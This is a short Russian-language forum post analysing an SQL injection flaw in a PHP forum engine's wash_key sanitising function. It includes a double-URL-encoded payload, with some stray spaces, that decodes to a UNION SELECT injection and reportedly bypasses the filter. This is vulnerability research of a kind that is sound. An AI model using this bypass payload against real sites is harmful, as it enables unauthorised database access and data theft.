Affects: 1.0-rc7 and below (The development version of 1.1 is also affected)
Severity: Critical
Details:
A flaw in includes/functions.php allows an attacker to inject SQL into an SQL statement.
но дальше этого описания ничего нет.. поэтому я решил посмотреть
.... если мы посмотрим includes/functions.php в 7 и 8 ветке увидим
функция что проверяет значения
PHP код:
// give our key a good scrubbin'
function wash_key($k)
{
//$k = str_replace('+',urlencode('+'),$k);
$k = htmlspecialchars(urldecode($k));
return $k;
}
и 8-мая
PHP код:
// give our key a good scrubbin'
function wash_key($k)
{
$k = htmlspecialchars($k,ENT_QUOTES);
return $k;
}
ну а если 2 раза закодировать
%25%32%37%25%32%30%25%37%35%25%36%45%25%36%39%25%3 6%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43% 25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32 %43%25%33%32%25%32%43%25%33%33%25%32%43%25%33%34%2 5%32%43%25%33%35%25%32%46%25%32%41
то функция пропустит
' union select 1,2,3,4,5/*
експлоит писать не стал, потому что мало форумов под 7-мой версией
з.ы. вообще под этим движком мало форумов))
з.з.ы у кого есть желание тестоните на локалхосте